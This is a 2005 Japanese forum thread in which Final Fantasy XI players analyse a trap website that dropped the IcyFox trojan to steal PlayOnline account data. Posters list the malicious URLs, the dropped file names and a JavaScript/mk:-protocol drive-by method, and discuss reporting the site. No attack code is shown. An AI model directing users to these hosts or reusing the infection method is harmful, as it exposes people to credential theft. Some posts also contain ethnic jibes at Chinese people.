hirofumi Mich satoyuki Jing Loeb Ary Bosco Hira
Hattrick Biank Itomichi Katusina Leticia Cseila
cervantes tohru Tada Yale Tiger Ujimaru
Enduro Youcantdoit Ricdias Utopia

詳細はここで
【おつかれw】No.22Cerberus総合81蹴目【おまえもなw】
http://yy33.kakiko.com/test/read.cgi/ff11/1128971869/
304既にその名前は使われています:2005/10/22(土) 17:12:40 ID:4q1y+DsW
この件スレ立ってたのか。
昨日踏んでマカフィーが反応したんで驚いたよ。
305既にその名前は使われています:2005/10/22(土) 17:14:17 ID:S6EIUtgJ
おいおい
POL自身がスパイウェアだろうがw
306既にその名前は使われています:2005/10/22(土) 17:40:06 ID:4AIxdpiv
下がりすぎ
307既にその名前は使われています:2005/10/22(土) 17:42:38 ID:ssLKAyl/
>>1のサイト、ドメインサーチしたらハルビンって出たよ。満州かよ。
308既にその名前は使われています:2005/10/22(土) 17:48:04 ID:S4CLSl4m
まとめ

・中華RMT業者と思わしき者が罠サイト作って
 POLアカウント情報を抜くウイルス(トロイ)を仕掛けていた

・罠サイト突如消える

・ばななの人のところで特集(詳しくはこちら)
http://park11.wakwak.com/~beatnic/

309既にその名前は使われています:2005/10/22(土) 18:02:13 ID:lLeKpzkv
>>308
罠サイトは消えていない。Yahoo!とMSNのスポンサーサイトから外されただけ。
310既にその名前は使われています:2005/10/22(土) 18:03:59 ID:yszhdmVo
もしもし1よ1さんよーせかいのうちでーおまえほどー
311既にその名前は使われています:2005/10/22(土) 18:05:28 ID:S4CLSl4m
>>309
あー、すまんこ
312既にその名前は使われています:2005/10/22(土) 18:07:53 ID:+VgK/QIW
うほw
スポンサーから消えただけでもザマーみそづけwって感じw
313既にその名前は使われています:2005/10/22(土) 18:10:34 ID:lLeKpzkv
Windows XP Pro Goldでも試してみた。
%SYSTEMROOT%\system32に3つのファイルを作ってる。
i.com、exploreff.exe、systemlff.dll。i.comとexploreff.exeは同じもの(ニセsvchost.exe)。
もうひとつのDLLはなんだか分からないけど、例のアヤシイ文字列がたくさん含まれる。

FFをインストールしていない環境ではいまのところおかしな通信はしていないもよん。
POLとかFFがインストールされてると挙動が変わるんだろうなぁたぶん。
314既にその名前は使われています:2005/10/22(土) 18:21:18 ID:S4CLSl4m
これはさすがにスクエニに通報しなくて良いのか・・・?
もちろん警察にも
315既にその名前は使われています:2005/10/22(土) 18:24:08 ID:1i5a07Wa
>>313
XP Pro Goldってなに?
ゴールド版ってのが出てるのかな?
316既にその名前は使われています:2005/10/22(土) 18:26:00 ID:rq4+rpWY
ttp://www.japan213.com/ は単なる入り口に過ぎない。
ttp://www.1102213.com/ff11help/money.htm
にフレームが飛んでいて、こいつが悪の元凶。
JavaScriptでsvchost.exeをいきなり食わせるという暴挙に出る。
またmk:プロトコルを使って食わせる。これについては
IEのバージョンを判定し攻撃できないと悟った場合は悔し紛れに
ttp://www.1102213.com/ff11help/money1.htm
経由でMicrosoftIISのHTTP404エラーを真似た画面を出す(ブラクラ狙い?))。
money1はコメントが英語であることや、headに
他には書いていないdoctypeを行儀よく書いてあることから
海外のいたずらHTML(かExploit)系サイトからコピペ改変したものと思われる。
money1が生成する偽のエラー画面には以下のテキストがある。
IcyFox76416026 IcyFoxLovelace IcyfoxYHG
IcyFoxについては後述する。
317既にその名前は使われています:2005/10/22(土) 18:26:52 ID:miLfo0j7
>>314
■に通報しても握りつぶすだけだから無駄。通報するなら警察だけに汁。
突然警察に捜索入られて、これまでのログ解析されて
これまで握りつぶしてきた分も一気に情報をあらわにされた、な〜んて事になったら楽しいなっと。
318316:2005/10/22(土) 18:27:47 ID:rq4+rpWY
さて、スパイ本体が設置してある www.1102213.comトップには
「島田RagnarokOnline研究室」があり、上記サイトと同様ファイル名は中国語のピンインっぽく
www.japan213.com と同一人物(グループ)の可能性が高いが、これがなんと全くの無害である。
ROプレーヤまたは関係者(ROのRMT業者?)のFFXIに対する攻撃という可能性を提示しておく。
また、このホストはページ下記に表記のある http://www.ragnarok-jp.com/ と同一IPである。
なおROをやっていないので「島田RagnarokOnline研究室」がどの程度知られているかは知らない。
もし有名な所らROコミュニティで叩いてくれると嬉しい。
319316:2005/10/22(土) 18:29:26 ID:rq4+rpWY
IcyFoxについて補足する。
wohisでは www.icyfox.com や www.icyfoxlovelace.com などの
ドメインが存在し、上記ドメインを含め全て中国のDNS 51.net に
登録されていることからスパイコンポーネントはこいつが主犯と思われる。
また本来 IcyFox は特にFFをターゲットとしたというよりは
中国国内でポピュラーなスパイウェアのようで、
ググると中国語の掲示板やblogでの駆除方法が散見される。
中国国内でしか広まっていないスパイウェアということで米国ベンダーではあまり知られておらず
http://www.sophos.co.jp/virusinfo/analyses/svl.cgi?virus=Troj/Icyfox-A&lang=17
程度しか引っかからないので、Norton、McAfee、バスターなどはあまり頼りにならない。
むしろ(日本では安かろう悪かろうと言われている)中国製の
ウィルスドクターやウィルスキラーが対策済みであるwww
320既にその名前は使われています:2005/10/22(土) 18:31:28 ID:HueJwe9q
でもFFが初めてのMMOで慣れないパソコンを触っている人も多数居るのも事実
このスレの住人のように検証してくれる人がいるとマジ助かります
321既にその名前は使われています:2005/10/22(土) 18:33:05 ID:lLeKpzkv
>>315
あ、すまそ。SP未適用の初期バージョンのこと<Gold
322既にその名前は使われています:2005/10/22(土) 18:38:47 ID:rq4+rpWY
名無しに戻ります。
島田RagnarokOnline研究室まじで(現時点では)無害なので目的がわかりません。
ROのRMT業者による、日本人をROに必死に勧誘するサイトとしか見えない。
だとすると今回のスパイ攻撃は(ユーザ、業者関係なく)FFそのものをまとめて攻撃し
FFを解約してROに来て(RMTして)くれという意図なんだろうか。

DDoSもこいつらか?

RO業者オソロシス
323既にその名前は使われています:2005/10/22(土) 18:41:44 ID:3ldcfQ/F
例のぷれみあさいと(gameinside.info)では、
この話題は触れられてないみたいだね。
TOPに出ててもおかしくなさそうな情報なんだがな。
324既にその名前は使われています:2005/10/22(土) 18:42:00 ID:miLfo0j7
>>322
長きにわたる任務ご苦労。シグネットをかけてやろう。
業者オソロシス
325既にその名前は使われています:2005/10/22(土) 18:43:49 ID:HueJwe9q
>だとすると今回のスパイ攻撃は(ユーザ、業者関係なく)FFそのものをまとめて攻撃し
>FFを解約してROに来て(RMTして)くれという意図なんだろうか。

うはw深読みしすぎwww
でも事実ならそろそろsageと無意味なスレ上げ攻撃がはじまるかもなー
326既にその名前は使われています:2005/10/22(土) 18:47:23 ID:rq4+rpWY
単純に日本を攻撃する意図なら島田研究室にもスパイ付けると思うんだわ。
韓国のゲームだと言っても日本語ページ(エンコード指定間違ってるけど)、
内容も日本人向けだし(注:ROは言語別サーバ)。
327既にその名前は使われています:2005/10/22(土) 18:55:59 ID:IGd0E6jP
ウイルスハンタープロジェクト
http://www.trendmicro.com/jp/security/virushunter.htm

ブツもらた香具師、上の所に送ったらウィルスバスターも対応してくれるかも試練。勇者求む
328既にその名前は使われています:2005/10/22(土) 18:57:16 ID:me9IUg4u
このサイト、ウィルス対策ソフト作ってる会社に通告して
調べてもらうのもありでしょ。もう通告した人おるんかな?

まぁ、どちらにせよバスターやノートンは、もう信用出来ないけどね…
329既にその名前は使われています:2005/10/22(土) 18:57:31 ID:f0ou7Hlv
なんにしても明らかに危険なのに
■は一切発表がないのね。
330既にその名前は使われています:2005/10/22(土) 19:04:33 ID:LKJ58k4w
つまりアクセス問題の原因はお前らのPCだっつう事だなW
331既にその名前は使われています:2005/10/22(土) 19:06:54 ID:1oyYnNhn
この一連の流れをヤホー掲示板にコピペして
ヤホーの管理責任は追及することはでんきないのかねえ?
スパイウエアを感染させるようなhpがスポンサーなんて
舐めてるとしか思えない
332既にその名前は使われています:2005/10/22(土) 19:17:04 ID:bSDAVw56
login_w.bin
が漏れのとこにもあるよ。ヤバス?
333既にその名前は使われています:2005/10/22(土) 19:18:52 ID:4AIxdpiv
とりあえずageてこうぜ!
334既にその名前は使われています:2005/10/22(土) 19:24:01 ID:zk9WuJls
WindowsXPのノンパッチで突撃してみた(FFはインスコしてない香具師)
感染までの詳しい動作はめんどくさいから書かんけど
タスクマネージャ開いて、プロセスに
exploreff.exeまたはi.comがいなければ、大丈夫と桃割れ。
信じる信じないはあなた次第(・∀・)
335既にその名前は使われています:2005/10/22(土) 19:26:36 ID:BbhUsyZ8
倉庫でイベント行ってボソっと「東亜病夫」ってsayしたら鬼のようにピンインtellが来たwwwwwwww
336既にその名前は使われています
>>335
和訳キボンヌ。東アジアの病原菌って意味か?